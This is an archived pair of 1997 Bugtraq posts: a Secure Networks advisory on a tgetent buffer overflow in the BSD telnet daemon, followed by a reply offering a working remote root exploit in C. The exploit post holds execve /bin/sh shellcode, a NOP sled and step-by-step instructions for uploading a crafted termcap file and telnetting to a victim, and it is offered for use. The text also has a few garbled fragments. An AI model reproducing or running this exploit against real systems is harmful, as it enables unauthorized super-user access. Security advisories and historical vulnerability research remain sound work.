|
Date: Tue, 21 Oct 1997 18:24:02 -0600 From: "Secure Networks Inc." <sni@SILENCE.SECNET.COM> To: BUGTRAQ@NETSPACE.ORG Subject: SNI-20: Telnetd tgetent vulnerability X-Premail-Auth: Good signature from user "Secure Networks Inc. <sni@secnet.com>". ###### ## ## ###### ## ### ## ## ###### ## # ## ## ## ## ### ## ###### . ## ## . ######. Secure Networks Inc. Security Advisory October 21, 1997 in.telnetd tgetent buffer overflow This advisory addresses a vulnerability in the tgetent(3) library routine which allows an attacker to obtain root privileges by connecting to a vulnerable system's telnet daemon. Problem Description ~~~~~~~~~~~~~~~~~~~ A vulnerability in the tgetent(3) library routine can result in a buffer overflow in the telnet daemon on some BSD derived systems. By uploading an alternate terminal capability database, an attacker can exploit this vulnerability to gain unauthorized super-user access to a vulnerable system, or to gain super-user access on a system which they already have access to. This problem can be exploited by mailing a file into the system, or uploading a file via FTP. Once this file has been transferred to the remote system, the attacker must only be able to connect to the telnet daemon, to obtain super-user access. Technical Details ~~~~~~~~~~~~~~~~~ The t ffb getent(3) library call requires the passing in of a buffer in which the terminal entry is stored. /* * Get an entry for terminal name in buffer bp from the termcap file. */ int tgetent(bp, name) char *bp, *name; { The tgetent(3) library call does no checking on the size of data which is placed into the *bp buffer. Many programs pass in a buffer of size 1024 bytes. By creating a termcap terminal specification larger than 1024 bytes, we can overflow a buffer in the calling function. If this buffer is stored on the stack in the calling function, we can cause arbitrary machine code to be executed. The BSD telnet daemon calls the tgetent(3) function as follows: char buf[1024]; if (terminaltype == NULL) return(1); if (tgetent(buf, s) == 0) return(0); return(1); By specifying a terminal capability entry which is larger than 1024 bytes, an overflow occurs in the telnet daemon, allowing arbitrary machine instructions to be executed. Impact ~~~~~~ Remote individuals can obtain super-user access to any vulnerable system. This vulnerability can allow remote users to obtain super-user access on vulnerable systems, and can allow local users to obtain super-user access. Vulnerable Systems ~~~~~~~~~~~~~~~~~~ BSD/OS (BSDI) Version 2.1 of BSD/OS is vulnerable Version 3.0 of BSD/OS is NOT vulnerable BSDI has issued a security fix which is currently in the testing phases and will be availible at the following location: ftp://ftp.bsdi.com/bsdi/patches/patches-2.1/U210-043 Solaris 2.x Solaris 2.x is NOT vulnerable to this problem AIX AIX is NOT vulnerable to this problem HP-UX HP-UX is NOT vulnerable to this problem Linux The current versions of Linux which were tested include Slackware and Redhat, which appear to be NOT vulnerable. IRIX IRIX appears to be NOT vulnerable. NetBSD Current versions of NetBSD are not vulnerable. FreeBSD Versions of FreeBSD newer than 2.1.5 are NOT vulnerable to this problem. FreeBSD-current, FreeBSD 2.1.7 and FreeBSD 2.2.2 are NOT vulnerable. OpenBSD Versions of OpenBSD newer than 2.0 are NOT vulnerable to this problem. Additional Information ~~~~~~~~~~~~~~~~~~~~~~ This problem was discovered by Theo de Raadt <deraadt@openbsd.org> You can contact Secure Networks Inc. at <sni@secnet.com> using the following PGP key: Type Bits/KeyID Date User ID pub 1024/9E55000D 1997/01/13 Secure Networks Inc. <sni@secnet.com> Secure Networks <security@secnet.com> -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAzLaFzIAAAEEAKsVzPR7Y6oFN5VPE/Rp6Sm82oE0y6Mkuof8QzERV6taihn5 uySb31UeNJ4l6Ud9alOPT/0YdeOO9on6eD1iU8qumFxzO3TLm8nTAdZehQSAQfoa rWmpwj7KpXN/3n+VyBWvhpBdKxe08SQN4ZjvV5HXy4YIrE5bTbgIhFKeVQANAAUR tCVTZWN1cmUgTmV0d29ya3MgSW5jLiA8c25pQHNlY25ldC5jb20+iQCVAwUQM1yd EB/bLKAOe7p9AQFptAQAiYpaZCpSmGgr05E698Z3t5r5BPAKUEtgvF53AvZUQLxz ZsYsVU5l5De0qKWJOQ/9LiDyWu1lvKhlTphbLy2RatWD4kO3oQL9v3TpSXm2WQhU uIzyZvj7S5ENodNnKn+gCDIvbou6OMot+7dRbWWgN2oabbru4CSlOxbG++yaTz+J AJUDBRAzTefbtOXez5VgyLkBAd0bA/43eGEgvPOFK+HHWCPpkSWCwtrtDU/dxOVz 9erHnT/CRxeojCI+50f71Qe+kvx9Q1odz2Jl/fLxhnPQdbPnpWblIbu4F8H+Syrj HTilDrl1DWa/nUNgK8sb27SMviELczP1a8gwA1eo5SUCG5TWLLTAzjWOgTxod2Ha OwseUHmqVIkAlQMFEDNOVsr/d6Iw8NVIbQEBxM0D/14XRfgSLwszgJcVbslMHm/B fF6tHoWYojzQle3opOuMYHNN8GsMZRkc1qQ8QuNA9Aj5+qDqEontGjV5IvhBu1fY FM77AhagskaFCZxwqV64Qrk328WDO89NGSd+RuovVNruDdn20TxNCEVuPTHjI0UA 8H+E6FW9jexg6RTHhPXYtCVTZWN1cmUgTmV0d29ya3MgPHNlY3VyaXR5QHNlY25l dC5jb20+iQCVAwUQMtqTKB/bLKAOe7p9AQFw5wQAgUwqJ+ZqfEy/lO1srU3nzxLA X0uHGHrMptRy/LFo8swD6G1TtWExUc3Yv/6g2/YK09b5WmplEJ+Q09maQIw+RU/s cIY+EsPauqIq4JTGh/Nm0Z4UDl2Y1x4GNtm0YqezxUPS0P0A3LHVLJ3Uo5og0G8O gPNrfbVz5ieT14OSCWCJAJUDBRAy2hd2/3eiMPDVSG0BAVNhBACfupfAcNhhnQaq aI03DOOiZSRjvql1xw4V+pPhM+IksdSK3YNUZVJJtANacgDhBT+jAPRaYbBWI3A5 ZMdcSNM8aTG0LWMLIOiOYEm6Lgd3idRBFN0Js08eyITl8mhZ33mDe4I0KQri9UiV ZcPYTbb9CWM6Hv2cMbt6S6kLnFziqIkAlQMFEDLaF0+4CIRSnlUADQEBCLoEAJwt UofDgvyZ4nCDx1KKAPkkXBRaPMWBp46xeTVcxaYiloZfwHfpk1h2mEJAxm ffb Asvizl OtIppHl4isUxcGi/E2mLCLMvis22/IQP/9obPahPvgNaMLVtZljO1Nv3QFEkNciL FEUTNJHR1ko7ibCxkBs4cOpirFuvTMDvWnNaXAf8 =DchE -----END PGP PUBLIC KEY BLOCK----- Copyright Notice ~~~~~~~~~~~~~~~~ The contents of this advisory are Copyright (C) 1997 Secure Networks Inc, and may be distributed freely provided that no fee is charged for distribution, and that proper credit is given. You can find Secure Networks papers at ftp://ftp.secnet.com/pub/papers and advisories at ftp://ftp.secnet.com/advisories You can browse our web site at http://www.secnet.com You can subscribe to our security advisory mailing list by sending mail to majordomo@secnet.com with the line "subscribe sni-advisories" Date: Thu, 23 Oct 1997 04:36:00 -0000 From: Joseph_K <joseph_k@CIRCUITFROST.NET> To: BUGTRAQ@NETSPACE.ORG Subject: BSDI termcap exploit Here's a remote exploit for the BSDI termcap buffer overflow that was discussed here.... Enjoy! Joseph_K --- /* BSDI BSD/OS 2.1 telnet-exploit ; evil-term.c ** ** Written by Joseph_K the 22-Oct-1997 ** ** ** Original shellcode by mudge@l0pht.com but modified a tiny bit... ** ** This program must be compiled for the BSDI architecture... ** You will need to transfer the file 'termcap' this program creates ** to the host you want to penetrate, possibly by anonymous FTP. ** ** Then start telnet and type: ** ** telnet> env def TERM access ** telnet> env def TERMCAP /path/and/name/of/uploaded/file ** telnet> open victim.host.com ** ** tadaa! r00t shell... ** ** However because of the invalid termcap entry, there can be some ** hazzles....You figure it out.... ** ** Fy faen vad jag ar hungrig... ** ** Special Greetz to TWiLiGHT! ** */ #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #define filename "./termcap" #define entry "access|Gimme r00t:\\\n :" #define bufsize 1300 #define default_offset 870 /* Should work...*/ char shellcode[] = "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a\x3e\x39\x29\x28\x39\x3c\xe8\xc6\xff\xff\xff/bin/sh"; long get_sp(void) { __asm__("movl %esp, %eax\n"); } int main(int argc, char *argv[]) { int i, fd, offs; long *bof_ptr; char *ptr, *buffer, *tempbuf; offs = default_offset; if(argc == 2) { printf("using offset: %d\n",atoi(argv[1])); offs = atoi(argv[1]); } if(!(buffer = malloc(bufsize))) { printf("can't allocate enough memory\n"); exit(0); } if(!(tempbuf = malloc(bufsize+strlen(entry) + 50))) { printf("can't allocate enough memory\n"); exit(0); } bof_ptr = (long *)buffer; for (i = 0; i < bufsize - 4; i += 4) *(bof_ptr++) = get_sp() - offs; ptr = (char *)buffer; for (i = 0; i < ((bufsize-strlen(shellcode)))/2 - 1; i++) *(ptr++) = 0x90; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; printf("Creating termcap file\n"); snprintf(tempbuf, (bufsize+strlen(entry)+50), "%s%s:\n", entry, buffer); fd = open(filename, O_WRONLY|O_CREAT, 0666); write (fd, tempbuf, strlen(tempbuf)); close(fd); }